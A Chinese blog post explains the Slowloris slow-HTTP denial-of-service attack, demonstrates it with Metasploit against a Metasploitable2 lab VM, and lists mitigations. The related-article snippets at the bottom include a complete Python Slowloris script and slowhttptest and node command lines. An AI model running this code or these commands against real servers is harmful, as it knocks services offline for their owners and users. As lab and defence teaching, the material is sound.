Slowloris DoS攻击的原理与简单实现

已于 2022-12-05 22:11:20 修改
阅读量2.8k 收藏 10
点赞数 5
文章标签: 网络安全
于 2022-12-05 20:49:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiexieyuchen/article/details/128192251
版权

前言

       Slowloris 攻击是我在李华峰老师的书——《Metasploit Web 渗透测试实战》里面看的,感觉既简单又使用,现在这种攻击是很容易被防护的啦。不过我也不敢真刀实战的去试,只是拿个靶机玩玩罢了。

         废话还是写在结语里面吧。(划掉)结语可以不看(划掉)

Slowloris攻击的原理

        Slowloris 是一种资源消耗类DoS攻击,它利用部分HTTP请求进行操作。也叫做慢速攻击,这里的慢速并不是说发动攻击慢,而是访问一条链接的速度慢。Slowloris攻击的功能是打开与目标Web服务器的连接,然后尽可能长时间的保持这些连接打开。如果由多台电脑同时发起Slowloris攻击,那么这个时候就可以叫做DDoS攻击了。(在b站看的,不对望指出)

        例如,一间饭店中突然来了一群客人,他们每个人占用一张餐桌,只点一个菜,如果服务员去催促他们,他们会再点一个菜,就这样一直占用着餐桌,从而导致饭店无法继续正常营业。

Slowloris攻击前的准备

        在发起攻击之前,我们需要找到一个靶机,也就是攻击目标。在这里,我是使用

Metasploitable2作为靶机。(需要使用到虚拟机,使用教程看这篇博客:点击这里

        将靶机启动后并使用ifconfig命令查看靶机的ip地址:

        然后我们使用主机的浏览器输入这个ip地址:

        可以看到,现在我们可以正常的访问靶机的这个网站。

使用kali虚拟机发起攻击

        发动Slowloris攻击有很多种方式,在这里我使用的是kali中的Metasploit。(安装kali虚拟机的教程自己去找吧,相信有兴趣看这篇博客的同学都是对网络安全感兴趣的)(我使用的虚拟机时VMware)        

        我们启动kali虚拟机后,打开漏洞利用工具集中的Metasploit framework:

        输入密码(就是kali的登录密码)进行登录:

        找到Slowloris模块并使用:

在图中的options中

Delay:表示一条维持一条链接的时间,也就是延时

Rhost:表示要攻击的目标ip

Rpost:表示发起攻击使用的端口,默认为80

Sockets:用来指定要发起的连接数量,默认是150

        接下来,我们设置好要攻击的目标ip,使用run命令开始发动攻击:

        可以看到,发起攻击后,靶机的网页无法进行刷新:

        

        以上就是Slowloris攻击的一次攻击过程。(很浅显的啦)

如何防护Slowloris攻击

1、提高服务器可用性:增加服务器在任何时候允许的最大客户端数量,这会增加攻击者在服务器过载之前必须建立的连接数量

2、限制传入请求个数:限制单个IP 地址允许建立的最大连接数

3、基于云的保护:使用可以充当反向代理的服务,在开始向源服务器发送任何内容之前缓冲传入请求,保护源服务器。

4、限制HTTP头部传输的最大许可时间:超过指定时间HTTP Header还没有传输完成,直接判定源IP地址为慢速连接攻击,中断连接并加入黑名单。

参考文献

[1] 李华峰.Metasploit Web 渗透测试实战[M].人民邮电出版社.2022.2

[2] https://zhuanlan.zhihu.com/p/457460501

[3] https://zhuanlan.zhihu.com/p/269119808

结语        

        半年多没写博客了,主要是懒,有些拖延症了。平时并没有很忙,专业分流的时候,我本来是选计科的,但是最后改了信安。信安的学习确实很广,很泛,学习都比较水了,所以我这一个学期感觉啥也没学就结束了(再过一周就结课了)。这学期我也是试着了解信安专业的比赛——ctf啦,参加了两个比赛,结果初赛都没过,更别说参加最后的夺旗赛了。不过我也是找了个网站刷了一下题啦,然后发现,这个比赛真的很看基础,光是杂项我就刷了挺久。花的时间基本都是去找工具,找wp这些上面,不过也很增长我的知识面(也确认了我菜的事实)。废话就到这里啦,等下我还要再写一篇python网络爬虫的blog。(说是写其实就是从做的课程实验搬过来罢了嘻嘻嘻)

        

xiaoyuer2815
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
Slowloris攻击与防御?--Ecloud(易刻得)专栏
Ecloud的博客
10-27 630
Slowloris攻击也称为 Slowloris拒绝服务攻击,一种慢速连接攻击。 Slowloris是什么? Slowloris也是拒绝服务攻击的一种,常见的DDOS攻击有SYN Flood , UDP Flood , ICMP Flood等。其中SYN Flood是一种非常经典的DDOS攻击。其利用的是TCP协议设计中的缺陷进行攻击的。前篇我们已经提到过,这里暂且不提。而Slowloris攻击则是利用Http协议的漏洞或设计缺陷,直接造成拒绝服务。 起源 Slowloris是在2009..
什么是 Slowloris DDoS 攻击?
ZY_Eliza的博客
01-14 910
Slowloris 是一种拒绝服务攻击程序,它允许攻击者通过打开和维护攻击者和目标之间的许多并发HTTP连接来压倒目标服务器。 Slowloris 攻击是如何工作的? Slowloris 是一种应用层攻击,它利用部分 HTTP 请求进行操作。攻击的功能是打开与目标 Web 服务器的连接,然后尽可能长时间地保持这些连接打开。 Slowloris 不是一类攻击,而是一种特定的攻击工具,旨在允许单台机器在不使用大量带宽的情况下关闭服务器。与消耗带宽的基于反射的DDoS 攻击(例如NTP 放大)不同,这种..
推荐开源项目:Python版Slowloris - 简单而有效的DDoS攻击模拟工具
最新发布
gitblog_00042的博客
05-12 457
推荐开源项目:Python版Slowloris - 简单而有效的DDoS攻击模拟工具 项目地址:https://gitcode.com/gkbrk/slowloris 项目介绍 慢lorisSlowloris)是一种基于Python的HTTP拒绝服务(DoS)攻击工具,它主要针对多线程服务器。这个项目由Gokberk Yaltirakli在2015年创建,并公开在GitHub上供开发者研究和学习...
Slowloris dos攻击原理及防护
时光漫步
12-03 2538
反射攻击已经成为DDoS攻击的主要方式,在一些博客中也有论述。 最为常用的当属ddos反射放大攻击。但是如今,受政策影响,反射式攻击放缓。2018年,平均每个月反射攻击下降了0.93万次,非反射攻击增加了0.35万次。Slowloris dos就是一个鲜明的例子。 Slowloris是一个基于perl的HTTP客户机的名称,它可以用作对基于Apache的HTTP服务器和SQUID缓存代理服务器的拒绝服务。 它通过反复向服务器发起数百个有效的HTTP请求来操作,并使用最小数量的TCP流量保持这些连接打开,以消
网络安全】HTTP Slowloris攻击原理解析
par@ish的博客
12-13 1641
Slowloris是一种针对Web服务器的攻击方式。它利用了服务器在处理HTTP连接时的一些弱点,通过向服务器发送大量的HTTP请求,但在每个请求的头部只发送部分数据并保持连接不断开的方式来耗尽服务器资源。
Slowloris攻击与Netflow
weixin_42486226的博客
04-27 199
Slowloris是网络攻击中比较老牌的选手了,关于它的防范技术也都很成熟,如果加上Netflow技术,其实可以做到更多。
RSNAKE 的 Slowloris DOS攻击工具初试
07-16 377
Slowloris 号称低带宽对服务器进行DDOS攻击 原理就是对WEB服务器发送 不完整的包并且以 单一 \r\n结尾,并不是 完整的HTTP包。造成WEB服务器堵塞达到最大连接数。 官网给出介绍,对以下几种服务器有效: Apache 1.x Apache 2.x dhttpd GoAhead WebServer WebSense "block pages" ...
slowloris-dos:一个用 node.js 编写的 sloworis 拒绝服务攻击应用程序
06-02
慢猪 ... cd /path/to/slowloris-dos/ 3. 安装项目特定的依赖项 在命令行界面输入: npm install 4. 执行 node index.js [target] [socks address] node index.js http://example.com localhost:9051
软件安全测试·DoS·HTTP慢速攻击
06-22
slowhttptest 工具可以模拟多种慢速攻击方式,包括 SlowlorisSlow HTTP POST DoS 攻击。 使用 slowhttptest 工具需要按照以下步骤进行: 1. 安装 slowhttptest 工具:slowhttptest 可以在 Kali Linux 中安装,...
slowloris:低带宽DoS工具。 Slowloris用Python重写
05-11
slowloris.py-Python中的简单slowloris 什么是SlowlorisSlowloris基本上是一种HTTP拒绝服务攻击,会影响线程服务器。 它是这样的: 我们开始发出许多HTTP请求。 我们会定期(每15秒发送一次)发送标头,以保持...
Orignal-Slowloris-HTTP-DoS:由于http
06-08
在Perl中,可以方便地创建网络连接并控制它们的状态,这使得它成为实现Slowloris这类攻击的理想选择。 Perl脚本中的核心策略包括以下几点: 1. **连接建立**:Slowloris会创建多个并发连接到目标服务器,每个连接都...
Slowloris DOS攻击原理及防护(续)
时光漫步
12-03 811
负载均衡器和SSL 我们已经解决了房子的HTTP侧,但是HTTPS(SSL)呢? 如果您有一个必须运行端到端加密的环境,并且使用SSL侦听器运行基于Apache的HTTP服务器,那么它很脆弱。 在基于Apache的SSL侦听器前面放置硬件负载均衡器并不能减轻这种漏洞。 这里有一个典型的场景: 客户端尝试HTTPS连接到Web站点。 加载均衡器“前端”网站,可能能够检测SSL会话ID,但不能检查SSL通信量,因此没有进一步的HTTP协议检查能力。 硬件负载均衡器将HTTPS连接发送回基于Apache的HTTP
如何进行dos攻击
weixin_33862514的博客
06-25 1077
简介 dos攻击(DenialOfService)就是拒绝服务攻击,牛逼的就是分布式拒绝服务攻击(ddos),详细的介绍看百度百科吧,今天介绍的工具是xerxes,它是比较不错的dos工具,是用c语言写的 操作 下载XERXESgit clone https://github.com/zanyarjamal/xerxes.gitcd ...
DOS攻击
yanglei818的博客
09-11 217
概念:DOS全称为Disk Operating System,意思是“磁盘操作系统”。DOS攻击通常是利用传输协议的漏洞、系统存在的漏洞、服务的漏洞,对目标系统发起大规模的进攻,用超出目标处理能力的海量数据包消耗可用系统资源、带宽资源等,或造成程序缓冲区溢出错误,致使其无法处理合法用户的正常请求,无法提供正常服务,最终致使网络服务瘫痪,甚至引起系统死机。这是破坏攻击目标正常运行的一种“损人不利己”的攻击手段目录一、设置Vmnet 4网卡 网段为:192.168.2.0。
DoS攻击
TABE_的博客
04-02 1129
这里写目录标题SYN洪泛攻击具体过程解决方法(SYN cookie)DoS攻击(拒绝服务攻击) SYN洪泛攻击 SYN洪泛攻击发生在三次握手建立TCP连接的过程中。 具体过程 攻击者发送TCP的SYN,服务器返回ACK后,该攻击者就不对其进行确认,那么这个TCP连接处于挂起状态,所谓的半连接状态。 服务器收不到再确认的话,还会重复发送ACK给攻击者,这样就更加浪费服务器资源。 攻击者如果发送非常大量的这种TCP连接,由于每一个都无法完成三次握手,所以服务器上这些TCP连接会因为挂起状态而消耗CPU和内存,
Slowhttptest慢速攻击Slowloris模式攻击与检测
weixin_66959526的博客
04-12 5299
slowloris:完整的http请求是以 \r\n\r\n 结尾,攻击时仅发送 \r\n,少发送一个 \r\n,服务器认为请求还未发完,就会一直等待直至超时。 攻击代码如下 slowhttptest -c 7000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u "url" -x 24 -p 3 解析: -C 1000 (建立链接数1000个) -H (使用SlowLoris模式) -g(测试完成后建立统计数据) -o xxx(指定输出文.
什么是慢速攻击?
m0_66268916的博客
01-02 588
慢速攻击(Slowloris attack)是一种网络攻击技术,旨在通过占用服务器上的所有可用连接来使其不可用。与传统的拒绝服务(DoS)和分布式拒绝服务(DDoS)攻击不同,慢速攻击利用服务器的资源限制来达到目的,而不是通过发送大量数据包来消耗带宽。 慢速攻击的原理是利用 HTTP 协议的特性,在发起请求后,保持连接处于 “半开放” 状态。攻击者通过发送大量的 HTTP 请求,并以极其缓慢的速度来发送请求头部,但不发送完整的请求内容或维持连接的状况,使得服务器上的连接不断增加,占用了可用的连接资源,最终
浅谈Slowloris拒绝服务攻击
热门推荐
梦落红尘
10-30 1万+
DDOS又称为分布式拒绝服务,全称是Distributed Denial of Service。DDOS本是利用合理的请求造成资源过载,导致服务不可用。比如一个停车场共有100车位,当100车位都停满后,再有车想要停进来,就必须等待已有的车先出去才行。如果已有的车一直不出去,那么停车场的入口就会排气长队,停车场的负荷过载,不能正常工作了,这种情况就是“拒绝服务”。         常见的DD
slowloris攻击python
03-06
Slowloris攻击是一种利用HTTP协议的漏洞进行的拒绝服务(DoS)攻击。它通过发送大量的半连接(Half-open connections)来耗尽目标服务器的资源,从而使其无法正常响应其他合法用户的请求。 在Python中,可以使用socket库来实现Slowloris攻击。下面是一个简单的示例代码: ```python import socket import random import time def slowloris_attack(target_host, target_port, num_connections): # 创建指定数量的socket连接 sockets = [] for _ in range(num_connections): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) s.connect((target_host, target_port)) sockets.append(s) # 发送HTTP请求头部 headers = "GET / HTTP/1.1\r\n" + \ "Host: " + target_host + "\r\n" + \ "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\n" + \ "Accept-language: en-US,en,q=0.5\r\n" + \ "Connection: keep-alive\r\n" + \ "Content-Length: 42\r\n" # 持续发送数据 while True: for s in sockets: try: s.send(headers.encode()) except socket.error: sockets.remove(s) # 随机延迟发送时间 time.sleep(random.randint(1, 10)) # 使用示例 target_host = "example.com" target_port = 80 num_connections = 100 slowloris_attack(target_host, target_port, num_connections) ``` 请注意,上述代码仅供学习和研究目的,请勿用于非法用途。进行任何未经授权的攻击是违法行为,可能会导致严重的法律后果。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoyuer2815

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值